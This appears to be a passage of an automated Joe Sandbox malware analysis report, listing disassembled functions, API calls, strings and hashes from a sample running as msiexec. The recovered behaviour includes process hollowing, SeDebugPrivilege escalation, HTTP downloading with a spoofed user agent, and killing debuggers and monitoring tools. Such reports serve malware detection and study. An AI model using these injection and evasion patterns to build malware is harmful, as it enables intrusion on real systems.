                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4294037311-0
                                                                                                                                                                                                                          • Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                                          • Instruction ID: da7283367b6e347ceaec0683e5fcdc910f264ff11ca6bb13f763834232a639b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86F03026D3CB83C2EA607B30B44677DAB64FF95B00F910435D98E42654CF3DD8099620
                                                                                                                                                                                                                          Function 00007FF775AE1050 Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 328 7ff775ae1050-7ff775ae108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2574300362-0
                                                                                                                                                                                                                          • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction ID: 43c7e2ffab496aba16f169902a993f432e235a1826f0741676c236efa12ac84a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7E00276528F8586C621EB15F84511EBBB4FBC9B94F904125EACD42B28DF3CC665CB04
                                                                                                                                                                                                                          Function 00007FF775AE3B24 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 329 7ff775ae3b24-7ff775ae3b33 330 7ff775ae3b35-7ff775ae3b42 VirtualFree 329->330 331 7ff775ae3b48-7ff775ae3b4c 329->331 330->331
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                          • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction ID: 5b049ba8361b1a9ad5451b69fcb38193ad49f8ab58d39728da3df0bb2ca847a5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80D01321E3494191E754A716D845715E790FFC5F44FC08035D58A41564CF3CD4958F00

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 00007FF775AE2048 Relevance: 63.4, APIs: 32, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 332 7ff775ae2048-7ff775ae20c2 GetModuleFileNameW 333 7ff775ae20c4 332->333 334 7ff775ae20c9-7ff775ae2105 332->334 337 7ff775ae296d-7ff775ae2975 333->337 335 7ff775ae211d-7ff775ae2139 call 7ff775ae1f88 334->335 336 7ff775ae2107-7ff775ae210f 334->336 346 7ff775ae217c-7ff775ae2186 335->346 338 7ff775ae2111-7ff775ae2119 336->338 339 7ff775ae213b-7ff775ae2157 call 7ff775ae1fc8 336->339 341 7ff775ae211b-7ff775ae2177 338->341 342 7ff775ae2159-7ff775ae2175 call 7ff775ae2008 338->342 339->346 341->337 342->346 350 7ff775ae218d-7ff775ae21e1 CreateProcessW 346->350 351 7ff775ae2188 346->351 352 7ff775ae21e3 350->352 353 7ff775ae21e8-7ff775ae2228 350->353 351->337 352->337 355 7ff775ae222f-7ff775ae224b GetFileSize 353->355 356 7ff775ae222a 353->356 357 7ff775ae224d-7ff775ae2255 355->357 358 7ff775ae2257-7ff775ae2262 CloseHandle 355->358 356->337 357->358 359 7ff775ae2267-7ff775ae228f VirtualAlloc 357->359 358->337 360 7ff775ae22a1-7ff775ae22cc ReadFile 359->360 361 7ff775ae2291-7ff775ae229c CloseHandle 359->361 362 7ff775ae22f1-7ff775ae233f CloseHandle GetThreadContext 360->362 363 7ff775ae22ce-7ff775ae22ec VirtualFree CloseHandle 360->363 361->337 364 7ff775ae2341-7ff775ae2354 VirtualFree 362->364 365 7ff775ae2359-7ff775ae23de ReadProcessMemory GetModuleHandleA GetProcAddress 362->365 363->337 364->337 367 7ff775ae23e0-7ff775ae23f3 VirtualFree 365->367 368 7ff775ae23f8-7ff775ae2461 VirtualAllocEx 365->368 367->337 369 7ff775ae2463-7ff775ae2476 VirtualFree 368->369 370 7ff775ae247b-7ff775ae24af WriteProcessMemory 368->370 369->337 371 7ff775ae24b1-7ff775ae24c4 VirtualFree 370->371 372 7ff775ae24c9-7ff775ae24d4 370->372 371->337 373 7ff775ae24e6-7ff775ae24f9 372->373 374 7ff775ae24ff-7ff775ae2588 WriteProcessMemory 373->374 375 7ff775ae25a7-7ff775ae25ee 373->375 376 7ff775ae25a2 374->376 377 7ff775ae258a-7ff775ae259d VirtualFree 374->377 378 7ff775ae2600-7ff775ae2613 375->378 376->373 377->337 380 7ff775ae2898-7ff775ae291c WriteProcessMemory SetThreadContext 378->380 381 7ff775ae2619-7ff775ae2668 RtlCompareMemory 378->381 382 7ff775ae2933-7ff775ae2943 ResumeThread 380->382 383 7ff775ae291e-7ff775ae2931 VirtualFree 380->383 384 7ff775ae266c-7ff775ae2695 381->384 385 7ff775ae266a 381->385 387 7ff775ae2945-7ff775ae2958 VirtualFree 382->387 388 7ff775ae295a-7ff775ae2967 VirtualFree 382->388 383->337 389 7ff775ae26a0-7ff775ae26ae 384->389 385->378 387->337 388->337 390 7ff775ae26b4-7ff775ae273f 389->390 391 7ff775ae2893 389->391 392 7ff775ae2751-7ff775ae275f 390->392 391->380 393 7ff775ae2765-7ff775ae2798 392->393 394 7ff775ae288e 392->394 395 7ff775ae279c-7ff775ae286f ReadProcessMemory WriteProcessMemory 393->395 396 7ff775ae279a 393->396 394->389 398 7ff775ae2871-7ff775ae2884 VirtualFree 395->398 399 7ff775ae2889 395->399 396->392 398->337 399->394
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FileModuleName
                                                                                                                                                                                                                          • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                          • API String ID: 514040917-3001742581
                                                                                                                                                                                                                          • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction ID: a6260dea1040d718c1258ccd843cc5ed5ac356bd9770747c02e1f83f310413e3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2732E93262CBC186E770DB15E855BAAB7A1FBC9B44F814139DA8E83B58DF3DD4448B10
                                                                                                                                                                                                                          Function 00007FF775AE40E4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                                                                                          • API String ID: 2379135442-2896544425
                                                                                                                                                                                                                          • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction ID: a7c0d8754142c0980c52f676fc7274016c49d929e36bdf0a8ead3442e9c9c0c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E413E3293868186E750DB51F845B6AFBA0FFC4B54F914135EA8947A98CF7DD448CF10
                                                                                                                                                                                                                          Function 00007FF775AE2CB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82memoryinjectionCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                          • API String ID: 4073123320-2766056989
                                                                                                                                                                                                                          • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction ID: 518e2730b8a71a784b22260bd3547a8c99a0ce1520d78092fb5b4130cf4195b2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7041E23262CA8586E770DB15F495B6ABBA0FB84B84F504039EACD83B58DF7ED4448B50
                                                                                                                                                                                                                          Function 00007FF775AE1CDC Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF775AE1D19
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                          • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                          • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction ID: 2e9eacb72c2314388169d0c87faea5caca5504c32ca3e21814e2355ad1843954
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0571EB36538B8182E750AB54F895B2AFBA0FBC4B95F911035FA8E43A68CF7CD4448B50
                                                                                                                                                                                                                          Function 00007FF775AE46E4 Relevance: 24.2, APIs: 16, Instructions: 155memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateCloseFileHandleProcessSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1391523307-0
                                                                                                                                                                                                                          • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction ID: bab05592642ebe82a8c1224be10badd231f107d7a6ee952211606a640b57c64d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68811032A2CB8182EB50DB55F45576AFBA0FBC9B91F514135EA8D83B68DF7CD0448B10
                                                                                                                                                                                                                          Function 00007FF775AE30DC Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE45C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3117), ref: 00007FF775AE4654
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3C24: RegDeleteKeyW.ADVAPI32 ref: 00007FF775AE3C3C
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF775AE3E37
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: Process32FirstW.KERNEL32 ref: 00007FF775AE3E6A
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: CloseHandle.KERNEL32 ref: 00007FF775AE3E7C
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: wcscmp.MSVCRT ref: 00007FF775AE3E91
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: OpenProcess.KERNEL32 ref: 00007FF775AE3EA7
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: TerminateProcess.KERNEL32 ref: 00007FF775AE3ECA
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: CloseHandle.KERNEL32 ref: 00007FF775AE3ED8
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: Process32NextW.KERNEL32 ref: 00007FF775AE3EEB
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3E24: CloseHandle.KERNEL32 ref: 00007FF775AE3EFD
                                                                                                                                                                                                                          • Sleep.KERNEL32 ref: 00007FF775AE31C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandle$ProcessProcess32$CreateDeleteFirstNextOpenSleepSnapshotTerminateToolhelp32wcscmp
                                                                                                                                                                                                                          • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                          • API String ID: 4011447834-928700279
                                                                                                                                                                                                                          • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction ID: 2caf934d57991e357965e2cd628a4cd7f7cae6f789fee521f92e16a3dadb3a17
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C215822E3858791EA04FB24E8539B9EFA0AF50F54FD24532E51E431E6DF2CF9098630
                                                                                                                                                                                                                          Function 00007FF775AE2E6C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                          • String ID: rbNSpGEsyb
                                                                                                                                                                                                                          • API String ID: 299056699-189039185
                                                                                                                                                                                                                          • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction ID: 99e866ab0a930e69ecbe2d85e58fa55037c996f308919bc648d1e67fe338a28c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D901E923A3CA9281E730AB11F856679AF60FF88F98F850135E94E42A74CF3CD9858610
                                                                                                                                                                                                                          Function 00007FF775AE38C4 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF775AE3784
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3744: GetVolumeInformationW.KERNEL32 ref: 00007FF775AE3801
                                                                                                                                                                                                                            • Part of subcall function 00007FF775AE3744: wsprintfW.USER32 ref: 00007FF775AE38A2
                                                                                                                                                                                                                          • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE390D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3922
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3935
                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3945
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE396D
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3980
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF775AE3AA9), ref: 00007FF775AE3995
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000E.00000002.2162841025.00007FF775AE1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF775AE0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162791687.00007FF775AE0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162892438.00007FF775AE5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162940559.00007FF775AE7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2162994225.00007FF775AE8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2163036608.00007FF775AEA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ff775ae0000_msiexec.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                                                          • API String ID: 943468954-4119554291
                                                                                                                                                                                                                          • Opcode ID: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                                          • Instruction ID: 867e4d0523d54abd6983510249531e6df935490b230c31b96c4c8f5087afbdfa
